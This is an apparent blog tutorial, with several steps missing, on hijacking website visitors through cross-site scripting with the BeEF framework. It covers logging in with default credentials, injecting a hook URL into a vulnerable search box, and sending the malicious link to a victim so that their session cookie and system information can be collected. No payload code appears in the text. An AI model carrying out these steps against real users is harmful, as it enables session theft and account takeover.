I hope you can learn by yourselves after read this tutorial. It happen the same in real life, do not expect to mastering this if you just learn about everything inside the school behind the table, you need to dig yourselves, try, try and try and put your comfort zone far away from you. Let start the tutorial
Step by step Hacking Using Beef XSS Framework
1. Before we start, here is the details information I use in this tutorial.
|OS: Backtrack 5
Already have XSS vulnerable website as a mediator
|OS: Windows 7 Ultimate
if you get an error, maybe you haven't installed the beef xss framework.
3. After you run beef in the step two, a window will popped out and tell you the username and password to log in to beef admin panel. By default the username: beef and password: beef. The beef control panel should be:
From the picture above, we must inject the hook URL address to the XSS vulnerable website.
6. Because I already have the XSS vulnerable website from the last tutorial about finding simple xss vulnerability so I just use one of it. The next step I also already prepare the code to inject in the search box
The next step attacker will copy the URL together with malicious script inside it and send it to victim. This is the URL looks like:
the picture above means that victim with IP 192.168.160.104 already click the malicious link with mediator xxx.com.
8. When we move to the Beef xss framework control panel, the control panel record some activity there.
9. Many information also available there including session cookie, system information, etc.
hope it useful
1. XSS can directly attack the user that visit a website.
2. Do not click a link that you don't know.
We will still continue the XSS attack series tutorial in the next post, keep updated. If you find this post useful, spread it!